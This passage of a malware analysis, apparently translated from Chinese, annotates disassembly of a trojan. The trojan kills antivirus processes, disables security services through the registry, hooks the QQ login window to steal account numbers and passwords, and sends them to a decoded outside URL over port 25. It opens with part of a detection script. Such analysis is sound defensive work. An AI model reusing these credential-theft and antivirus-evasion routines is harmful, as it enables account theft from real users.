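    {"TimeCreated": "2009-12-13T16:44:09", "EventID": 7036, "service": "Spooler", "state": "stopped"},
    {"TimeCreated": "2009-12-13T18:10:00", "EventID": 7036, "service": "kavsvc", "state": "stopped"},
]

if __name__ == "__main__":
    for alert in security_stop_bursts(SAMPLE_RECORDS):
        print(f"{alert['first']}..{alert['last']}: {', '.join(alert['services'])}")
```

One caveat: ReyOfAntiViu's later Start=4 changes are written straight to the registry, not through ChangeServiceConfig, so the SCM logs no 7040 "start type changed" event for them; catching that part needs registry auditing or a direct check of the Services keys.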
CloseAntiVirus obtains a window handle by calling FindWindowA with the window name, then posts WM_QUIT with PostMessage to close the specified antivirus window. Its first step disables 密码防盗专家 (a password anti-theft tool); it then shuts down the running antivirus software, the window names terminated being: FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE RAVTIMER.EXE Iparmor.exe MAILMON.EXE KAVPFW.EXE KmailMon.EXE KAVStart.exe TrojanDetector.EXE KVFW.EXE KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE EGHOST.EXE KWatch9x.exe KvDetech.exe KVCenter.kxp UIHost.exe KATMain.EXE. It also closes the following running windows: TrojDie_Frame KvXP_ExpertFrame Jiangmin Registry Monitor Ex KVXP_Monitor 瑞星杀毒软件下载版 金山毒霸 2005 卡巴斯基反病毒单机版 WHXMDI0 Symantec AntiVirus 企业版 江民杀毒软件 KV2004:实时监视 天网防火墙个人版 天网防火墙企业版 噬菌体 木马克星 RavMon.exe TfLockDownMain ZoneAlarm ZAFrameWnd Tapplication 〖列举启动〗
ReyOfAntiViu first writes the trojan into the registry so that it runs at boot, then under SYSTEM\CurrentControlSet\Services\ adds: navapsvc, RsRavMon, RsCCenter, kavsvc, KVSrvXP, wscsvc, KPfwSvc, KWatchSvc, SNDSrvc, ccProxy, ccEvtMgr, ccSetMgr, SPBBCSvc, Symantec Core LC, NPFMntor, MskService, FireSvc, McShield, McTaskManager, McAfeeFramework, setting the "Start" value of each to 4. Under SoftWare\Microsoft\Windows\CurrentVersion\Run it attempts to delete: RavMon, KAVPersonal50, RavTimer, RavTask, KvMonXP, iDuba Personal FireWall, KAVRun, KpopMon, Kulansyn, KavPFW, KvXP, ccApp, SSC_UserPrompt, NAV CfgWiz, MCAgentExe, McRegWiz, MCUpdateExe, MSKAGENTEXE, MSKDetectorExe, VirusScanOnline, VSOCheckTask, McAfeeUpdaterUI, Network Associates Error Reporting, Service, ShStatEXE, KavStart, Services, KWatch9x.
DelKeyGetQQ first checks for the keyboard-protection driver and, if present, corrupts and deletes it; it then installs a hook to steal the QQ number.
PEp0:0040AB2C DelKeyGetQQ proc near ; DATA XREF:
...
PEp0:0040AB58 mov edx, offset aSoftwareTencen ; "SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1"
PEp0:0040AB5D mov eax, 80000002h
PEp0:0040AB62 call CallRegQueryValue ; read the registry value
PEp0:0040AB8B mov ecx, offset aNpkcrypt_sys ; "npkcrypt.sys"
PEp0:0040AB90 call sub_403D4C
PEp0:0040AB95 mov eax, [ebp+var_4]
PEp0:0040AB98 call Test_eax_1
PEp0:0040AB9D mov ebx, eax
PEp0:0040AB9F push ebx ; lpFileName
PEp0:0040ABA0 call GetFileAttributesA ; get the attributes of "npkcrypt.sys"
...
PEp0:0040ABDF push eax ; lpNewFileName
PEp0:0040ABE0 push ebx ; lpExistingFileName
PEp0:0040ABE1 call CopyFileA ; copy "npkcrypt.bak" over "npkcrypt.sys"
PEp0:0040ABE6 push ebx ; lpFileName
PEp0:0040ABE7 call DeleteFileA ; delete "npkcrypt.sys", completely destroying the QQ keyboard-protection driver
PEp0:0040ABEC loc_40ABEC: ; CODE XREF:
PEp0:0040ABEC call SetHookGetQQ ; install the hook to steal the account
PEp0:0040ABEC DelKeyGetQQ endp
SetHookGetQQ works through a series of calls to GetQQ, which obtains the QQ number and password and sends them to a designated server. The hook procedure handles the WM_CANCELJOURNAL message separately, and its decision point is the left-button click message: on a left click it checks the cursor position and, if appropriate, reads the QQ number from the "ComboBox" control by sending it a message. For other messages it uses the first keystroke as the trigger and obtains the password from the "Edit" control by capturing the keyboard state and sending messages.
PEp0:00408340 ; LRESULT __stdcall GetQQ(int, WPARAM, LPARAM)
PEp0:00408363 cmp dword ptr [ebx], 201h ; WM_LBUTTONDOWN, left button pressed
PEp0:00408369 jnz short Go_GetPassWord ; not a left click, jump on to get the password
PEp0:0040836B mov ecx, ebx
PEp0:0040836D mov edx, edi
PEp0:0040836F mov eax, esi
PEp0:00408371 call GetQQNumber ; get the QQ number from the "ComboBox" control
PEp0:00408376 Go_GetPassWord: ; CODE XREF: GetQQ+29 j
PEp0:00408376 cmp dword ptr [ebx], 100h ; WM_KEYFIRST message
PEp0:0040837C jnz short Go_Out_1 ; wrong message, not the first keystroke, jump out
PEp0:0040837E mov ecx, ebx
PEp0:00408380 mov edx, edi
PEp0:00408382 mov eax, esi
PEp0:00408384 call GetQQPassword ; get the QQ password from the "Edit" control
GetQQNumber is the handler for the intercepted left-button click. It first uses the static controls on the QQ interface to decide whether the window is the QQ login dialog, then checks whether the click landed on the login button; if so it sends WM_GETTEXT to read the value of the "ComboBox" control, i.e. it steals the QQ number.
PEp0:00407D6C GetQQNumber proc near ; CODE XREF: GetQQ+31 p
...
PEp0:00407D8B call GetActiveWindow ; get the current active window
PEp0:00407D90 mov ebx, eax
PEp0:00407D92 push 14h ; nMaxCount
PEp0:00407D94 lea eax, [ebp+lParam]
PEp0:00407D97 push eax ; lpClassName
PEp0:00407D98 push ebx ; hWnd
PEp0:00407D99 call GetClassNameA ; get the class name of the active window
PEp0:00407D9E lea eax, [ebp+var_7C]
PEp0:00407DA1 lea edx, [ebp+lParam]
PEp0:00407DA4 mov ecx, 33h
PEp0:00407DA9 call CmpString_1 ; if not equal, repeat the string search
PEp0:00407DAE mov eax, [ebp+var_7C]
PEp0:00407DB1 mov edx, offset a32770_3 ; "#32770"
PEp0:00407DB6 call sub_403E4C
PEp0:00407DBB jnz Go_Out
PEp0:00407DC1 push offset szWindow ; "注册新号码"
PEp0:00407DC6 push offset szClass ; "Static"
PEp0:00407DCB push 0 ; hWndChildAfter
PEp0:00407DCD push ebx ; hWndParent
PEp0:00407DCE call FindWindowExA
PEp0:00407DD3 mov esi, eax
PEp0:00407DD5 push offset aQqIg ; "QQ号码:"
PEp0:00407DDA push offset szClass ; "Static"
PEp0:00407DDF push 0 ; hWndChildAfter
PEp0:00407DE1 push ebx ; hWndParent
PEp0:00407DE2 call FindWindowExA
PEp0:00407DE7 mov edi, eax
PEp0:00407DE9 push offset aZI ; "用户号码:"
PEp0:00407DEE push offset szClass ; "Static"
PEp0:00407DF3 push 0 ; hWndChildAfter
PEp0:00407DF5 push ebx ; hWndParent
PEp0:00407DF6 call FindWindowExA
PEp0:00407DFB mov [ebp+var_4], eax
PEp0:00407DFE push offset zhanghaoshuoming ; "帐号说明"
PEp0:00407E03 push offset szClass ; "Static"
PEp0:00407E08 push 0 ; hWndChildAfter
PEp0:00407E0A push ebx ; hWndParent
PEp0:00407E0B call FindWindowExA
PEp0:00407E10 test esi, esi
PEp0:00407E12 jnz short Go_ToGetNumber ; the "注册新号码" static control exists
PEp0:00407E14 test edi, edi
PEp0:00407E16 jnz short Go_ToGetNumber ; the "QQ号码:" static control exists
PEp0:00407E18 cmp [ebp+var_4], 0
PEp0:00407E1C jnz short Go_ToGetNumber ; the "用户号码:" static control exists
PEp0:00407E1E test eax, eax
PEp0:00407E20 jz Go_Out ; none of the controls exists, "帐号说明" included, jump out
PEp0:00407E26 Go_ToGetNumber: ; CODE XREF:
PEp0:00407E26 push offset aQq ; " 登录QQ"
PEp0:00407E2B push offset aButton ; "Button"
PEp0:00407E30 push 0 ; hWndChildAfter
PEp0:00407E32 push ebx ; hWndParent
PEp0:00407E33 call FindWindowExA
PEp0:00407E38 mov esi, eax
PEp0:00407E3A push offset aTm ; " 登录TM"
PEp0:00407E3F push offset aButton ; "Button"
PEp0:00407E44 push 0 ; hWndChildAfter
PEp0:00407E46 push ebx ; hWndParent
PEp0:00407E47 call FindWindowExA
PEp0:00407E4C mov edi, eax
PEp0:00407E4E push offset asc_407FE8 ; "登录"
PEp0:00407E53 push offset aButton ; "Button"
PEp0:00407E58 push 0 ; hWndChildAfter
PEp0:00407E5A push ebx ; hWndParent
PEp0:00407E5B call FindWindowExA
PEp0:00407E60 mov [ebp+hWnd], eax
PEp0:00407E63 lea eax, [ebp+Rect]
PEp0:00407E66 push eax ; lpRect
PEp0:00407E67 push esi ; hWnd
PEp0:00407E68 call GetWindowRect ; get the rectangle of the "登录QQ" button
PEp0:00407E6D lea eax, [ebp+rc]
PEp0:00407E70 push eax ; lpRect
PEp0:00407E71 push edi ; hWnd
PEp0:00407E72 call GetWindowRect ; get the rectangle of " 登录TM"
PEp0:00407E77 lea eax, [ebp+var_77]
PEp0:00407E7A push eax ; lpRect
PEp0:00407E7B mov eax, [ebp+hWnd]
PEp0:00407E7E push eax ; hWnd
PEp0:00407E7F call GetWindowRect ; get the rectangle of the "登录" button
PEp0:00407E84 lea eax, [ebp+Point]
PEp0:00407E87 push eax ; lpPoint
PEp0:00407E88 call GetCursorPos ; write the cursor position into the POINT structure
PEp0:00407E8D push [ebp+Point.y]
PEp0:00407E90 push [ebp+Point.x] ; pt
PEp0:00407E93 lea eax, [ebp+Rect]
PEp0:00407E96 push eax ; lprc
PEp0:00407E97 call PtInRect ; check whether the cursor is on the "登录QQ" button
PEp0:00407E9C test eax, eax
PEp0:00407E9E jnz short Go_GetNumber
PEp0:00407EA0 push [ebp+Point.y]
PEp0:00407EA3 push [ebp+Point.x] ; pt
PEp0:00407EA6 lea eax, [ebp+rc]
PEp0:00407EA9 push eax ; lprc
PEp0:00407EAA call PtInRect ; check whether the cursor is on " 登录TM"
PEp0:00407EAF test eax, eax
PEp0:00407EB1 jnz short Go_GetNumber
PEp0:00407EB3 push [ebp+Point.y]
PEp0:00407EB6 push [ebp+Point.x] ; pt
PEp0:00407EB9 lea eax, [ebp+var_77]
PEp0:00407EBC push eax ; lprc
PEp0:00407EBD call PtInRect ; check whether the cursor is on the "登录" button
PEp0:00407EC2 test eax, eax
PEp0:00407EC4 jz Go_Out ; on none of them, jump out
PEp0:00407ECA Go_GetNumber: ; CODE XREF:
PEp0:00407ECA ; GetQQNumber+145 j
PEp0:00407ECA push offset byte_407FF0 ; lpszWindow
PEp0:00407ECF push offset aCombobox ; "ComboBox"
PEp0:00407ED4 push 0 ; hWndChildAfter
PEp0:00407ED6 push ebx ; hWndParent
PEp0:00407ED7 call FindWindowExA ; reached when the cursor is on a login button: look for the "ComboBox" control
PEp0:00407EDC lea edx, [ebp+lParam]
PEp0:00407EDF push edx ; lParam
PEp0:00407EE0 push 32h ; wParam
PEp0:00407EE2 push 0Dh ; Msg
PEp0:00407EE4 push eax ; hWnd
PEp0:00407EE5 call SendMessageA ; send WM_GETTEXT to read the "ComboBox" text into the buffer at edx
PEp0:00407EEA lea eax, [ebp+var_C]
PEp0:00407EED lea edx, [ebp+lParam]
PEp0:00407EF0 mov ecx, 33h
PEp0:00407EF5 call CmpString_1
PEp0:00407EFA mov eax, offset dword_40D6FC
PEp0:00407EFF mov edx, [ebp+var_C]
PEp0:00407F02 call sub_403BDC
PEp0:00407F07 push offset aSIGD ; "设置密码保护"
PEp0:00407F0C push offset szClass ; "Static"
PEp0:00407F11 push 0 ; hWndChildAfter
PEp0:00407F13 push ebx ; hWndParent
PEp0:00407F14 call FindWindowExA
PEp0:00407F19 test eax, eax
PEp0:00407F1B jz short loc_407F2C ; no "设置密码保护" static control, jump
PEp0:00407F1D mov eax, offset dword_40D700
PEp0:00407F22 mov edx, offset aEph_2 ; "EPH"
PEp0:00407F27 call sub_403BDC
PEp0:00407F2C loc_407F2C: ; CODE XREF:
PEp0:00407F2C push 0
PEp0:00407F2E mov ecx, offset SendDataNet ; send the data
PEp0:00407F33 mov dl, 1
PEp0:00407F35 mov eax, off_4048AC
PEp0:00407F3A call CreateThreadCallFun
PEp0:00407F3F mov eax, hhk
PEp0:00407F44 push eax ; hhk
PEp0:00407F45 call UnhookWindowsHookEx
...
PEp0:00407F7C GetQQNumber endp
GetQQPassword first uses some of the static controls on the QQ login interface to decide whether this is the QQ login dialog, then obtains the handle of the "Edit" control and checks whether it is the current input box. If the Edit is not the current input window it jumps on to check for an Enter-key message; if it is an Enter key it sends WM_GETTEXT to obtain the QQ number, otherwise it obtains the password by capturing the keyboard state.
PEp0:0040801C GetQQPassword proc near ; CODE XREF: GetQQ+44 p
...
PEp0:0040804A call GetActiveWindow ; get the handle of the active window
PEp0:0040804F mov ebx, eax
PEp0:00408051 push 14h ; nMaxCount
PEp0:00408053 lea eax, [ebp+lParamClassName]
PEp0:00408059 push eax ; lpClassName
PEp0:0040805A push ebx ; hWnd
PEp0:0040805B call GetClassNameA ; get its class name
PEp0:00408060 lea eax, [ebp+var_148]
PEp0:00408066 lea edx, [ebp+lParamClassName]
PEp0:0040806C mov ecx, 33h
PEp0:00408071 call CmpString_1
PEp0:00408076 mov eax, [ebp+var_148]
PEp0:0040807C mov edx, offset a32770_2 ; "#32770"
PEp0:00408081 call sub_403E4C
PEp0:00408086 jnz Go_Out
PEp0:0040808C push offset aVSI ; "注册新号码"
PEp0:00408091 push offset aStatic_0 ; "Static"
PEp0:00408096 push 0 ; hWndChildAfter
PEp0:00408098 push ebx ; hWndParent
PEp0:00408099 call FindWindowExA
PEp0:0040809E mov esi, eax
PEp0:004080A0 push offset aQqIg_0 ; "QQ号码:"
PEp0:004080A5 push offset aStatic_0 ; "Static"
PEp0:004080AA push 0 ; hWndChildAfter
PEp0:004080AC push ebx ; hWndParent
PEp0:004080AD call FindWindowExA
PEp0:004080B2 mov edi, eax
PEp0:004080B4 push offset aZI_0 ; "用户号码:"
PEp0:004080B9 push offset aStatic_0 ; "Static"
PEp0:004080BE push 0 ; hWndChildAfter
PEp0:004080C0 push ebx ; hWndParent
PEp0:004080C1 call FindWindowExA
PEp0:004080C6 mov [ebp+var_8], eax
PEp0:004080C9 push offset asc_4082F8 ; "帐号说明"
PEp0:004080CE push offset aStatic_0 ; "Static"
PEp0:004080D3 push 0 ; hWndChildAfter
PEp0:004080D5 push ebx ; hWndParent
PEp0:004080D6 call FindWindowExA
PEp0:004080DB test esi, esi
PEp0:004080DD jnz short Succeed_Go ; found the "注册新号码" static control, jump
PEp0:004080DF test edi, edi
PEp0:004080E1 jnz short Succeed_Go ; found the "QQ号码:" static control, jump
PEp0:004080E3 cmp [ebp+var_8], 0
PEp0:004080E7 jnz short Succeed_Go ; found the "用户号码:" static control, jump
PEp0:004080E9 test eax, eax
PEp0:004080EB jz Go_Out ; none of the controls exists, "帐号说明" included, jump out
PEp0:004080F1 Succeed_Go: ; CODE XREF:
PEp0:004080F1 ; GetQQPassword+C5 j ...
PEp0:004080F1 push offset byte_408304 ; lpszWindow
PEp0:004080F6 push offset aEdit ; "Edit"
PEp0:004080FB push 0 ; hWndChildAfter
PEp0:004080FD push ebx ; hWndParent
PEp0:004080FE call FindWindowExA ; find the handle of the "Edit" control
PEp0:00408103 mov esi, eax
PEp0:00408105 push offset byte_408304 ; lpszWindow
PEp0:0040810A push offset a32770 ; "#32770"
PEp0:0040810F push 0 ; hWndChildAfter
PEp0:00408111 push ebx ; hWndParent
PEp0:00408112 call FindWindowExA ; find a child control of class "#32770"
PEp0:00408117 test eax, eax
PEp0:00408119 jz short loc_40812D ; not found, jump
PEp0:0040811B push offset byte_408304 ; lpszWindow
PEp0:00408120 push offset aEdit ; "Edit"
PEp0:00408125 push 0 ; hWndChildAfter
PEp0:00408127 push eax ; hWndParent
PEp0:00408128 call FindWindowExA ; get the Edit control, here the password input box
PEp0:0040812D loc_40812D: ; CODE XREF:
PEp0:0040812D test eax, eax
PEp0:0040812F jz short GetPassWordFromKey ; failed to get the password box control, jump to capture the password from the keyboard state
PEp0:00408131 mov esi, eax
PEp0:00408133 GetPassWordFromKey: ; CODE XREF: GetQQPassword+113 j
PEp0:00408133 call GetFocus
PEp0:00408138 cmp esi, eax ; is the current focus the password input box
PEp0:0040813A jnz GetComboBox ; if not, jump
PEp0:00408140 lea eax, [ebp+KeyState]
PEp0:00408146 push eax ; lpKeyState
PEp0:00408147 call GetKeyboardState ; get the keyboard state
PEp0:0040814C push 0 ; uFlags
PEp0:0040814E lea eax, [ebp+Char]
PEp0:00408151 push eax ; lpChar
PEp0:00408152 lea eax, [ebp+KeyState]
PEp0:00408158 push eax ; lpKeyState
PEp0:00408159 mov esi, [ebp+var_4]
PEp0:0040815C mov eax, [esi+8]
PEp0:0040815F shr eax, 10h
PEp0:00408162 and eax, 0FFh
PEp0:00408167 push eax ; uScanCode
PEp0:00408168 mov eax, [esi+4]
PEp0:0040816B push eax ; uVirtKey
PEp0:0040816C call ToAscii ; convert the key to its ASCII character
PEp0:00408171 dec eax
PEp0:00408172 jnz short GetComboBox ; jump to read the value of the ComboBox control
PEp0:004081E8 GetComboBox: ; CODE XREF:
PEp0:004081E8 mov eax, [ebp+var_4]
PEp0:004081EB cmp dword ptr [eax+4], 1C0Dh ; Enter key (virtual key 0Dh, scan code 1Ch)
PEp0:004081F2 jnz Go_Out
PEp0:004081F8 push offset byte_408304 ; lpszWindow
PEp0:004081FD push offset aCombobox_0 ; "ComboBox"
PEp0:00408202 push 0 ; hWndChildAfter
PEp0:00408204 push ebx ; hWndParent
PEp0:00408205 call FindWindowExA
PEp0:0040820A mov esi, eax
PEp0:0040820C lea eax, [ebp+lParamClassName]
PEp0:00408212 push eax ; lParam
PEp0:00408213 push 32h ; wParam
PEp0:00408215 push 0Dh ; Msg
PEp0:00408217 push esi ; hWnd
PEp0:00408218 call SendMessageA ; send WM_GETTEXT to read the "ComboBox" text
PEp0:0040821D lea eax, [ebp+var_10]
PEp0:00408220 lea edx, [ebp+lParamClassName]
PEp0:00408226 mov ecx, 33h
PEp0:0040822B call CmpString_1
PEp0:00408230 push offset aSIGD_0 ; "设置密码保护"
PEp0:00408235 push offset aStatic_0 ; "Static"
PEp0:0040823A push 0 ; hWndChildAfter
PEp0:0040823C push ebx ; hWndParent
PEp0:0040823D call FindWindowExA
PEp0:00408242 test eax, eax
PEp0:00408244 jz short GoToSendData_1
PEp0:00408246 mov eax, offset dword_40D700
PEp0:0040824B mov edx, offset aEph_1 ; "EPH"
PEp0:00408250 call sub_403BDC
PEp0:00408255 GoToSendData_1: ; CODE XREF:
PEp0:00408255 mov eax, offset dword_40D6FC
PEp0:0040825A mov edx, [ebp+var_10]
PEp0:0040825D call sub_403BDC
PEp0:00408262 push 0
PEp0:00408264 mov ecx, offset SendDataNet ; send the data packet
PEp0:00408269 mov dl, 1
PEp0:0040826B mov eax, off_4048AC
PEp0:00408270 call CreateThreadCallFun
PEp0:00408275 mov eax, hhk
PEp0:0040827A push eax ; hhk
PEp0:0040827B call UnhookWindowsHookEx
...
PEp0:004082BA GetQQPassword endp
Below is the data-sending part.
PEp0:0040729C SendDataNet proc near ; DATA XREF:
...
PEp0:00407509 lea edx, [ebp+var_E0]
PEp0:0040750F mov eax, offset aVcmpx?dkgsysyn ; "VCMpX?dkGsYsYnu_VRMqGbuaY>y]Xs<kUsIiGra"...
PEp0:00407514 call RevertString ; "http://www.cidu.net/asp/gsm/ip.a"
PEp0:00407519 mov eax, [ebp+var_E0]
PEp0:0040751F lea edx, [ebp+var_20]
PEp0:00407522 call OpenUrl ; read data from the above URL; since the link is dead it is not known what it returned
...
PEp0:00407615 push 0 ; lpWindowName
PEp0:00407617 push offset ClassName ; "Afx:400000:b"
PEp0:0040761C call FindWindowA
PEp0:00407621 test eax, eax
PEp0:00407623 jz short loc_40762E ; look for the specified window; if not found, sleep and search again
PEp0:00407625 mov [ebp+var_8], 1
PEp0:0040762C jmp short loc_40763B ; found, jump
PEp0:0040762E loc_40762E: ; CODE XREF:
PEp0:0040762E push 3E8h ; dwMilliseconds
PEp0:00407633 call Sleep
PEp0:00407638 dec esi
PEp0:00407639 jnz short loc_407615 ; jump back and keep searching
Once the data has been read, SendData_Net sends it out.
PEp0:004054D0 SendData_Net proc near ; CODE XREF:
...
PEp0:00405555 call GetIPbyName ; initialise networking and obtain the local host information
PEp0:0040555A mov eax, [ebp+var_18]
PEp0:0040555D mov edx, offset a127_0_0_1 ; "127.0.0.1"
PEp0:00405562 call sub_403E4C
PEp0:00405567 jz Go_Out
PEp0:0040556D xor ebx, ebx
PEp0:0040556F mov esi, 6
PEp0:00405574 Go_InitSock: ; CODE XREF:
PEp0:00405574 mov ecx, edi
PEp0:00405576 mov edx, 19h
PEp0:0040557B mov eax, [ebp+var_4]
PEp0:0040557E call InitSock ; initialise the socket: data is sent over TCP to port 25 (19h)
PEp0:00405583 test al, al
PEp0:00405585 jnz short loc_405593 ; socket initialised, jump
PEp0:00405587 push 2710h ; dwMilliseconds
PEp0:0040558C call Sleep
PEp0:00405591 jmp short loc_405597 ; sleep 10 seconds, then jump back to initialise the socket again
PEp0:00405593 loc_405593: ; CODE XREF:
PEp0:00405593 mov bl, 1
PEp0:00405595 jmp short Go_SendData
PEp0:00405597 loc_405597: ; CODE XREF:
PEp0:00405597 dec esi
PEp0:00405598 jnz short Go_InitSock ; jump back to initialise the socket again
PEp0:0040559A Go_SendData: ; CODE XREF:
PEp0:0040559A test bl, bl
PEp0:0040559C jz Go_Out
Here the data is assembled and sent out; the code is long, so it is not reproduced here (see the attachment).
PEp0:00405750 call SendData
PEp0:00405755 lea edx, [ebp+var_54]
PEp0:00405758 mov eax, [edi]
PEp0:0040575A call RecvData
PEp0:0040575F nop
PEp0:00405760 mov eax, [edi]
PEp0:00405762 call ClearNet ; release the socket resources
...
PEp0:004057A9 SendData_Net endp
Below is the part that closes Recovery Genius (还原精灵).
PEp0:0040B97C CloseHUJL: ; DATA XREF: PEp0:0040BBFB o
PEp0:0040B97C call CloseHUJL_1
PEp0:0040B981 retn
It looks for windows with the following names: 'LanCardS','原精','还原精灵','原精 DEMO','还原精灵 DEMO','原精21st','还原精灵21st','原精21st DEMO','还原精灵21st DEMO','还原精灵21st操作选择', then reads the password from memory, sends it to the specified Edit control via messages, and sends BM_CLICK, the equivalent of clicking the button on the interface, to close Recovery Genius.
PEp0:00409F54 CloseHUJL_1 proc near ; CODE XREF: PEp0:CloseHUJL p
...
PEp0:00409F77 push eax
PEp0:00409F78 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409F7D mov edx, offset aSoftwareGolden ; "SOFTWARE\\GoldenSoft\\Recovery Genius 21s"...
PEp0:00409F82 mov eax, 80000002h
PEp0:00409F87 call CallRegQueryValue ; try to read the InstallPath value under SOFTWARE\GoldenSoft\Recovery Genius 21st
PEp0:00409F8C cmp [ebp+var_C], 0
PEp0:00409F90 jnz short loc_409FAA ; read succeeded, jump
PEp0:00409F92 lea eax, [ebp+var_C]
PEp0:00409F95 push eax
PEp0:00409F96 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409F9B mov edx, offset aSoftwareGold_0 ; "SOFTWARE\\GoldenSoft\\Recovery Genius"
PEp0:00409FA0 mov eax, 80000002h
PEp0:00409FA5 call CallRegQueryValue ; retry with a different registry key
PEp0:00409FAA loc_409FAA: ; CODE XREF: CloseHUJL_1+3C j
PEp0:00409FAA cmp [ebp+var_C], 0
PEp0:00409FAE jnz short loc_409FC8 ; read succeeded, jump ahead
PEp0:00409FB0 lea eax, [ebp+var_C]
PEp0:00409FB3 push eax
PEp0:00409FB4 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409FB9 mov edx, offset aSoftwareYuanzh ; "SOFTWARE\\YuanZhi\\Recovery Genius 21st"
PEp0:00409FBE mov eax, 80000002h
PEp0:00409FC3 call CallRegQueryValue ; read failed, try yet another key
PEp0:00409FC8 loc_409FC8: ; CODE XREF: CloseHUJL_1+5A j
PEp0:00409FC8 cmp [ebp+var_C], 0
PEp0:00409FCC jnz short loc_409FE6 ; success, jump ahead
PEp0:00409FCE lea eax, [ebp+var_C]
PEp0:00409FD1 push eax
PEp0:00409FD2 mov ecx, offset aInstallpath ; "InstallPath"
PEp0:00409FD7 mov edx, offset aSoftwareYuan_0 ; "SOFTWARE\\YuanZhi\\Recovery Genius"
PEp0:00409FDC mov eax, 80000002h
PEp0:00409FE1 call CallRegQueryValue ; read failed, keep trying
PEp0:00409FE6 loc_409FE6: ; CODE XREF: CloseHUJL_1+78 j
PEp0:00409FE6 cmp [ebp+var_C], 0
PEp0:00409FEA jz Go_Out ; every read failed: Recovery Genius is not installed, exit
...
PEp0:00409FFE mov ecx, offset aApple_dll ; "\\Apple.dll"
PEp0:0040A003 mov edx, [ebp+var_C]
PEp0:0040A006 call sub_403D4C
PEp0:0040A00B mov eax, [ebp+var_20]
PEp0:0040A00E call Test_eax_1
PEp0:0040A013 push eax ; lpFileName
PEp0:0040A014 call GetFileAttributesA
PEp0:0040A019 cmp eax, 0FFFFFFFFh
PEp0:0040A01C jnz Go_Out ; jnz: exits when "\\Apple.dll" already exists (GetFileAttributesA did not return -1)
PEp0:0040A022 lea eax, [ebp+var_24]
PEp0:0040A025 mov ecx, offset aWjsyhn_tmd ; "\\WjSYhN.tmd"
PEp0:0040A02A mov edx, [ebp+var_C]
PEp0:0040A02D call sub_403D4C
PEp0:0040A032 mov eax, [ebp+var_24]
PEp0:0040A035 call Test_eax_1
PEp0:0040A03A push eax ; lpFileName
PEp0:0040A03B call GetFileAttributesA
PEp0:0040A040 cmp eax, 0FFFFFFFFh
PEp0:0040A043 jnz Go_Out ; jnz: exits when "\\WjSYhN.tmd" already exists (GetFileAttributesA did not return -1)
PEp0:0040A049 lea eax, [ebp+var_C]
PEp0:0040A04C mov edx, offset aHddgmon_exe ; "\\HDDGMon.exe"
PEp0:0040A051 call sub_403D08
PEp0:0040A056 mov eax, [ebp+var_C]
PEp0:0040A059 call Test_eax_1
PEp0:0040A05E mov ebx, eax
PEp0:0040A060 push ebx ; lpFileName
PEp0:0040A061 call GetFileAttributesA
PEp0:0040A066 cmp eax, 0FFFFFFFFh
PEp0:0040A069 jz Go_Out ; "\\HDDGMon.exe" not found, exit
PEp0:0040A06F push 5 ; uCmdShow
PEp0:0040A071 push ebx ; lpCmdLine
PEp0:0040A072 call WinExec ; run "\\HDDGMon.exe", i.e. launch Recovery Genius
PEp0:0040A077 push 7D0h ; dwMilliseconds
PEp0:0040A07C call Sleep
PEp0:0040A081 push offset aLancards ; "LanCardS"
PEp0:0040A086 push offset a32770_1 ; "#32770"
PEp0:0040A08B call FindWindowA
PEp0:0040A090 mov ebx, eax
PEp0:0040A092 test ebx, ebx
PEp0:0040A094 jz Go_Out ; dialog titled "LanCardS" not found, exit
PEp0:0040A09A xor eax, eax
PEp0:0040A09C call DelFile
PEp0:0040A0A1 lea eax, [ebp+dwProcessId]
PEp0:0040A0A4 push eax ; lpdwProcessId
PEp0:0040A0A5 push ebx ; hWnd
PEp0:0040A0A6 call GetWindowThreadProcessId
PEp0:0040A0AB call GetForegroundWindow
PEp0:0040A0B0 mov [ebp+hWnd], eax
PEp0:0040A0B3 cmp [ebp+hWnd], 0
PEp0:0040A0B7 jz short loc_40A0CE ; no foreground window, jump ahead and use the desktop window instead
Next it looks up the window handle with FindWindowA using Recovery Genius's various window names; that code is omitted here, see the attachment for details.
PEp0:0040A1E3 test ebx, ebx
PEp0:0040A1E5 jz short loc_40A249
PEp0:0040A1E7 push 0 ; nCmdShow
PEp0:0040A1E9 push ebx ; hWnd
PEp0:0040A1EA call ShowWindow ; hide the Recovery Genius window
PEp0:0040A1EF mov ecx, offset aS_0 ; "&S"
PEp0:0040A1F4 mov edx, offset aButton_1 ; "Button"
PEp0:0040A1F9 mov eax, ebx
PEp0:0040A1FB call IsControlTrue ; check that the control has the expected class
PEp0:0040A200 test eax, eax
PEp0:0040A202 jz short loc_40A249
PEp0:0040A204 push 0 ; lParam
PEp0:0040A206 push 1 ; wParam
PEp0:0040A208 push 0F1h ; Msg
PEp0:0040A20D push eax ; hWnd
PEp0:0040A20E call SendMessageA ; send BM_SETCHECK (0F1h)
PEp0:0040A213 mov ecx, offset aO ; "&O"
PEp0:0040A218 mov edx, offset aButton_1 ; "Button"
PEp0:0040A21D mov eax, ebx
PEp0:0040A21F call IsControlTrue
PEp0:0040A224 push 0 ; lParam
PEp0:0040A226 push 0 ; wParam
PEp0:0040A228 push 0F5h ; Msg
PEp0:0040A22D push eax ; hWnd
PEp0:0040A22E call PostMessageA ; post BM_CLICK (0F5h), equivalent to a left click on the button above
PEp0:0040A233 push 0 ; nCmdShow
PEp0:0040A235 push ebx ; hWnd
PEp0:0040A236 call ShowWindow ; hide the window with SW_HIDE
PEp0:0040A23B mov edx, offset aStep_1 ; "step.1"
PEp0:0040A240 mov eax, ebx
PEp0:0040A242 call SendSetTextMsg ; send WM_SETTEXT to the Recovery Genius window, changing its title to "step.1"
PEp0:0040A247 jmp short loc_40A25D
PEp0:0040A249 loc_40A249: ; CODE XREF: CloseHUJL_1+291 j
PEp0:0040A249 push 1 ; dwMilliseconds
PEp0:0040A24B call Sleep
PEp0:0040A250 inc edi
PEp0:0040A251 cmp edi, 321h
PEp0:0040A257 jnz loc_40A0ED ; not yet 321h iterations, jump back and keep searching
After the window is hidden it keeps searching for Recovery Genius handles, finds the "&Y" button and sends it a click message so that the "check administrator password" dialog appears.
PEp0:0040A390 push offset aSzSAA ; lpszWindow
PEp0:0040A395 push offset a32770_1 ; "#32770"
PEp0:0040A39A push 0 ; hWndChildAfter
PEp0:0040A39C push 0 ; hWndParent
